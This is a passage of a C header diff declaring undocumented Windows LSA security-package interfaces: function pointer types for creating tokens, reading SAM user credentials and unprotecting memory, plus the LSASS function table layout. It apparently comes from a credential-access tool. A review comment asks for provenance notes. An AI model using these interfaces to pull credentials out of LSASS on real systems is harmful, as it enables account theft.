+typedef NTSTATUS (WINAPI * PLSA_MAP_BUFFER) (IN PSecBuffer InputBuffer, OUT PSecBuffer OutputBuffer);
+typedef NTSTATUS (WINAPI * PLSA_CREATE_TOKEN) (IN PLUID LogonId, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN LSA_TOKEN_INFORMATION_TYPE TokenInformationType, IN PVOID TokenInformation, IN PTOKEN_GROUPS TokenGroups, IN PUNICODE_STRING AccountName, IN PUNICODE_STRING AuthorityName, IN PUNICODE_STRING Workstation, IN PUNICODE_STRING ProfilePath, OUT PHANDLE Token, OUT PNTSTATUS SubStatus);
+typedef NTSTATUS (WINAPI * PLSA_CREATE_TOKEN_EX) (IN PLUID LogonId, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN LSA_TOKEN_INFORMATION_TYPE TokenInformationType, IN PVOID TokenInformation, IN PTOKEN_GROUPS TokenGroups, IN PUNICODE_STRING Workstation, IN PUNICODE_STRING ProfilePath, IN PVOID SessionInformation, IN SECPKG_SESSIONINFO_TYPE SessionInformationType, OUT PHANDLE Token, OUT PNTSTATUS SubStatus);
+typedef VOID (WINAPI * PLSA_AUDIT_LOGON) (IN NTSTATUS Status, IN NTSTATUS SubStatus, IN PUNICODE_STRING AccountName, IN PUNICODE_STRING AuthenticatingAuthority, IN PUNICODE_STRING WorkstationName, IN OPTIONAL PSID UserSid, IN SECURITY_LOGON_TYPE LogonType, IN PTOKEN_SOURCE TokenSource, IN PLUID LogonId);
+typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGE) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
+typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGEEX) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ClientBufferBase, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
+typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGE_PASSTHROUGH) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ClientBufferBase, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
+typedef BOOLEAN (WINAPI * PLSA_GET_CALL_INFO) (OUT PSECPKG_CALL_INFO Info);
+typedef PVOID (WINAPI * PLSA_CREATE_SHARED_MEMORY) (ULONG MaxSize, ULONG InitialSize);
+typedef PVOID (WINAPI * PLSA_ALLOCATE_SHARED_MEMORY) (PVOID SharedMem, ULONG Size);
+typedef VOID (WINAPI * PLSA_FREE_SHARED_MEMORY) (PVOID SharedMem, PVOID Memory);
+typedef BOOLEAN (WINAPI * PLSA_DELETE_SHARED_MEMORY) (PVOID SharedMem);
+typedef NTSTATUS (WINAPI * PLSA_OPEN_SAM_USER) (PSECURITY_STRING Name, SECPKG_NAME_TYPE NameType, PSECURITY_STRING Prefix, BOOLEAN AllowGuest, ULONG Reserved, PVOID * UserHandle);
+typedef NTSTATUS (WINAPI * PLSA_GET_USER_CREDENTIALS) (PVOID UserHandle, PVOID * PrimaryCreds, PULONG PrimaryCredsSize, PVOID * SupplementalCreds, PULONG SupplementalCredsSize);
+typedef NTSTATUS (WINAPI * PLSA_GET_USER_AUTH_DATA) (PVOID UserHandle, PUCHAR * UserAuthData, PULONG UserAuthDataSize);
+typedef NTSTATUS (WINAPI * PLSA_CLOSE_SAM_USER) (PVOID UserHandle);
+typedef NTSTATUS (WINAPI * PLSA_GET_AUTH_DATA_FOR_USER) (PSECURITY_STRING Name, SECPKG_NAME_TYPE NameType, PSECURITY_STRING Prefix, PUCHAR * UserAuthData, PULONG UserAuthDataSize, PUNICODE_STRING UserFlatName);
+typedef NTSTATUS (WINAPI * PLSA_CONVERT_AUTH_DATA_TO_TOKEN) (IN PVOID UserAuthData, IN ULONG UserAuthDataSize, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN PUNICODE_STRING AuthorityName, OUT PHANDLE Token, OUT PLUID LogonId, OUT PUNICODE_STRING AccountName, OUT PNTSTATUS SubStatus);
+typedef NTSTATUS (WINAPI * PLSA_CRACK_SINGLE_NAME) (IN ULONG FormatOffered, IN BOOLEAN PerformAtGC, IN PUNICODE_STRING NameInput, IN PUNICODE_STRING Prefix OPTIONAL, IN ULONG RequestedFormat, OUT PUNICODE_STRING CrackedName, OUT PUNICODE_STRING DnsDomainName, OUT PULONG SubStatus);
+typedef NTSTATUS (WINAPI * PLSA_AUDIT_ACCOUNT_LOGON) (IN ULONG AuditId, IN BOOLEAN Success, IN PUNICODE_STRING Source, IN PUNICODE_STRING ClientName, IN PUNICODE_STRING MappedName, IN NTSTATUS Status);
+typedef NTSTATUS (WINAPI * PLSA_CLIENT_CALLBACK) (IN PCHAR Callback, IN ULONG_PTR Argument1, IN ULONG_PTR Argument2, IN PSecBuffer Input, OUT PSecBuffer Output);
+typedef NTSTATUS (WINAPI * PLSA_REGISTER_CALLBACK) (ULONG CallbackId, PLSA_CALLBACK_FUNCTION Callback);
+typedef NTSTATUS (WINAPI * PLSA_UPDATE_PRIMARY_CREDENTIALS) (IN PSECPKG_PRIMARY_CRED PrimaryCredentials, IN OPTIONAL PSECPKG_SUPPLEMENTAL_CRED_ARRAY Credentials);
+typedef VOID (WINAPI * PLSA_PROTECT_MEMORY) (IN PVOID Buffer, IN ULONG BufferSize);
+typedef NTSTATUS (WINAPI * PLSA_OPEN_TOKEN_BY_LOGON_ID) (IN PLUID LogonId, OUT HANDLE *RetTokenHandle);
+typedef NTSTATUS (WINAPI * PLSA_EXPAND_AUTH_DATA_FOR_DOMAIN) (IN PUCHAR UserAuthData, IN ULONG UserAuthDataSize, IN PVOID Reserved, OUT PUCHAR * ExpandedAuthData, OUT PULONG ExpandedAuthDataSize);
+
+
+
+#ifndef _ENCRYPTED_CREDENTIAL_DEFINED
+#define _ENCRYPTED_CREDENTIAL_DEFINED
+
+typedef struct _ENCRYPTED_CREDENTIALW {
+ CREDENTIALW Cred;
+ ULONG ClearCredentialBlobSize;
+} ENCRYPTED_CREDENTIALW, *PENCRYPTED_CREDENTIALW;
+#endif // _ENCRYPTED_CREDENTIAL_DEFINED
+
+#define CREDP_FLAGS_IN_PROCESS 0x01 // Caller is in-process. Password data may be returned
+#define CREDP_FLAGS_USE_MIDL_HEAP 0x02 // Allocated buffer should use MIDL_user_allocte
+#define CREDP_FLAGS_DONT_CACHE_TI 0x04 // TargetInformation shouldn't be cached for CredGetTargetInfo
+#define CREDP_FLAGS_CLEAR_PASSWORD 0x08 // Credential blob is passed in in-the-clear
+#define CREDP_FLAGS_USER_ENCRYPTED_PASSWORD 0x10 // Credential blob is passed protected by RtlEncryptMemory
+#define CREDP_FLAGS_TRUSTED_CALLER 0x20 // Caller is a trusted process (eg. logon process).
+
+typedef enum _CredParsedUserNameType
+{
+ parsedUsernameInvalid = 0,
+ parsedUsernameUpn,
+ parsedUsernameNt4Style,
+ parsedUsernameCertificate,
+ parsedUsernameNonQualified
+} CredParsedUserNameType;
+
+
+typedef NTSTATUS (NTAPI CredReadFn) (IN PLUID LogonId, IN ULONG CredFlags, IN LPWSTR TargetName, IN ULONG Type, IN ULONG Flags, OUT PENCRYPTED_CREDENTIALW *Credential);
+typedef NTSTATUS (NTAPI CredReadDomainCredentialsFn) (IN PLUID LogonId, IN ULONG CredFlags, IN PCREDENTIAL_TARGET_INFORMATIONW TargetInfo, IN ULONG Flags, OUT PULONG Count, OUT PENCRYPTED_CREDENTIALW **Credential);
+
+typedef VOID (NTAPI CredFreeCredentialsFn) (IN ULONG Count, IN PENCRYPTED_CREDENTIALW *Credentials OPTIONAL);
+typedef NTSTATUS (NTAPI CredWriteFn) (IN PLUID LogonId, IN ULONG CredFlags, IN PENCRYPTED_CREDENTIALW Credential, IN ULONG Flags);
+typedef NTSTATUS (NTAPI CrediUnmarshalandDecodeStringFn)(IN LPWSTR MarshaledString, OUT LPBYTE *Blob, OUT ULONG *BlobSize, OUT BOOLEAN *IsFailureFatal);
+
+typedef struct _LSA_SECPKG_FUNCTION_TABLE {
+ PLSA_CREATE_LOGON_SESSION CreateLogonSession;
+ PLSA_DELETE_LOGON_SESSION DeleteLogonSession;
+ PLSA_ADD_CREDENTIAL AddCredential;
+ PLSA_GET_CREDENTIALS GetCredentials;
+ PLSA_DELETE_CREDENTIAL DeleteCredential;
+ PLSA_ALLOCATE_LSA_HEAP AllocateLsaHeap;
+ PLSA_FREE_LSA_HEAP FreeLsaHeap;
+ PLSA_ALLOCATE_CLIENT_BUFFER AllocateClientBuffer;
+ PLSA_FREE_CLIENT_BUFFER FreeClientBuffer;
+ PLSA_COPY_TO_CLIENT_BUFFER CopyToClientBuffer;
+ PLSA_COPY_FROM_CLIENT_BUFFER CopyFromClientBuffer;
+ PLSA_IMPERSONATE_CLIENT ImpersonateClient;
+ PLSA_UNLOAD_PACKAGE UnloadPackage;
+ PLSA_DUPLICATE_HANDLE DuplicateHandle;
+ PLSA_SAVE_SUPPLEMENTAL_CREDENTIALS SaveSupplementalCredentials;
+ PLSA_CREATE_THREAD CreateThread;
+ PLSA_GET_CLIENT_INFO GetClientInfo;
+ PLSA_REGISTER_NOTIFICATION RegisterNotification;
+ PLSA_CANCEL_NOTIFICATION CancelNotification;
+ PLSA_MAP_BUFFER MapBuffer;
+ PLSA_CREATE_TOKEN CreateToken;
+ PLSA_AUDIT_LOGON AuditLogon;
+ PLSA_CALL_PACKAGE CallPackage;
+ PLSA_FREE_LSA_HEAP FreeReturnBuffer;
+ PLSA_GET_CALL_INFO GetCallInfo;
+ PLSA_CALL_PACKAGEEX CallPackageEx;
+ PLSA_CREATE_SHARED_MEMORY CreateSharedMemory;
+ PLSA_ALLOCATE_SHARED_MEMORY AllocateSharedMemory;
+ PLSA_FREE_SHARED_MEMORY FreeSharedMemory;
+ PLSA_DELETE_SHARED_MEMORY DeleteSharedMemory;
+ PLSA_OPEN_SAM_USER OpenSamUser;
+ PLSA_GET_USER_CREDENTIALS GetUserCredentials;
+ PLSA_GET_USER_AUTH_DATA GetUserAuthData;
+ PLSA_CLOSE_SAM_USER CloseSamUser;
+ PLSA_CONVERT_AUTH_DATA_TO_TOKEN ConvertAuthDataToToken;
+ PLSA_CLIENT_CALLBACK ClientCallback;
+ PLSA_UPDATE_PRIMARY_CREDENTIALS UpdateCredentials;
+ PLSA_GET_AUTH_DATA_FOR_USER GetAuthDataForUser;
+ PLSA_CRACK_SINGLE_NAME CrackSingleName;
+ PLSA_AUDIT_ACCOUNT_LOGON AuditAccountLogon;
+ PLSA_CALL_PACKAGE_PASSTHROUGH CallPackagePassthrough;
+ CredReadFn *CrediRead;
+ CredReadDomainCredentialsFn *CrediReadDomainCredentials;
+ CredFreeCredentialsFn *CrediFreeCredentials;
+ PLSA_PROTECT_MEMORY LsaProtectMemory;
+ PLSA_PROTECT_MEMORY LsaUnprotectMemory;
+ PLSA_OPEN_TOKEN_BY_LOGON_ID OpenTokenByLogonId;
+ PLSA_EXPAND_AUTH_DATA_FOR_DOMAIN ExpandAuthDataForDomain;
+ PLSA_ALLOCATE_PRIVATE_HEAP AllocatePrivateHeap;
+ PLSA_FREE_PRIVATE_HEAP FreePrivateHeap;
+ PLSA_CREATE_TOKEN_EX CreateTokenEx;
+ CredWriteFn *CrediWrite;
+ CrediUnmarshalandDecodeStringFn *CrediUnmarshalandDecodeString;
+} LSA_SECPKG_FUNCTION_TABLE, *PLSA_SECPKG_FUNCTION_TABLE;
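Review bot: Nothing in this header records where the LSA_SECPKG_FUNCTION_TABLE and SECPKG_* layouts were copied from or which Windows releases they were checked against; these are hand-transcribed private structures whose member order is the ABI, and code reading them inside LSASS will dereference the wrong slot if a member is missing or misordered for the running build (the `// NT 5.1` and `// NT 6` markers in SECPKG_CLIENT_INFO already show the layout changing between releases). Add a file-level comment such as `// Hand-copied from ntsecpkg.h (Windows 7-era SDK); member order is the ABI seen by LSASS, do not reorder or insert members without re-checking against the target build.` The `Ce fichier :` line in the licence header repeats the licence URL and looks like a copy-paste slip, presumably meant to point at the file's origin. KIWI_GENERIC_PRIMARY_CREDENTIAL carries a Password member; whatever its in-memory encoding, a note that callers should wipe any copy of this structure after use would be in keeping with the rest of the header.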